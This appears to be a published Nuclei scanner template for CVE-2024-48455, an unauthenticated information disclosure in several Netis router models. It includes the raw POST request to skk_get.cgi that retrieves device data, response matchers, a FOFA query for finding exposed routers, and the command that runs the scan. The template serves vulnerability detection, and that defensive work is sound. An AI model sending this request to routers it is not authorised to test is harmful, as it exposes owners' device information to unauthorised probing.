Skip to content

Netis Wifi Router - Information Disclosure

ID: CVE-2024-48455

Severity: high

Author: s4e-io

Tags: netis,router,exposure

An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.

id: CVE-2024-48455
info:
name: Netis Wifi Router - Information Disclosure
author: s4e-io
severity: high
description: |
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the mode_name, wl_link parameters of the skk_get.cgi component.
reference:
- https://attackerkb.com/topics/L6qgmDIMa1/cve-2024-48455
- https://github.com/users/h00die-gr3y/projects/1/views/1
- https://nvd.nist.gov/vuln/detail/CVE-2024-48455
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-48455
cwe-id: CWE-200
epss-score: 0.00043
epss-percentile: 0.11049
metadata:
max-request: 1
fofa-query: title="Netis"
tags: netis,router,exposure
http:
- raw:
- |
POST /cgi-bin/skk_get.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mode_name=skk_get&wl_link=0
matchers:
- type: dsl
dsl:
- 'contains_all(body, "version\":", "vender\":", "statsList\":", "uptime\":")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100ff3fe42cfa3a9c6315521c76340e7d49563d98c005db0d0ecd49431aaba02c78022076cbef13a9b0b2ddec429eaefdf68dd5f59d2b12fde535e6e5478eca6c28e309:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48455.yaml"

View on Github